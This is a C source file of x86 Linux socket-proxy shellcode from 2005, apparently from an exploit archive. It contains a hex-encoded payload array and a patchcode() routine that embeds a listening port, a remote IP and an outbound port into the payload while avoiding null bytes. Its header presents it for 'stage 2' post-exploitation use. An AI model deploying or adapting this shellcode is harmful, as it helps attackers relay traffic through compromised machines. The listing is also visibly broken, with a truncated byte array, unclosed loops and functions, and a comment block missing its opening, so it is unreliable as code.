 *                372 byte socket-proxy shellcode                            *
 *              by Russell Sanford - [email protected]                          *
 *    filename: x86-linux-bounce-proxy.c                                     *
 *        date: 12/23/2005                                                   *
 *        info: Compiled with DTP Project.                                   *
 * discription: This is a x86-linux proxy shellcode. This is probably best   *
 * 	        used in stage 2 situations. The syntax for invoking the      *
 * 	        patchcode is as follows:                                     *
 *                                                                           *
 * 		patchcode(shellcode,31337,"",80);                 *
 *                                                                           *
 * 		Where 31337 is the port to listen to on the remote host      *

char shellcode[] =
"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89"
"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1"

int find_safe_offset(int INT_A) {

	int INT_B=0;
	do {
		INT_A -= 0x01010101;	INT_B += 0x01010101;
	while ( ((INT_A & 0x000000ff) == 0) || 
		((INT_A & 0x0000ff00) == 0) || 
		((INT_A & 0x00ff0000) == 0) ||
		((INT_A & 0xff000000) == 0) );

	return INT_B;

void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) {
	int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2);
	int PORT_IN_B = find_safe_offset(PORT_IN_A);	

	int IP_A = inet_addr(IP);
	int IP_B = find_safe_offset(IP_A);

	int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2);
	int PORT_OUT_B = find_safe_offset(PORT_OUT_A);	

	*(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B);
	*(int *)&shellcode[141] = PORT_IN_B;

	*(int *)&shellcode[205] = (IP_A - IP_B);
	*(int *)&shellcode[212] = IP_B;
	*(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B);
	*(int *)&shellcode[224] = PORT_OUT_B;
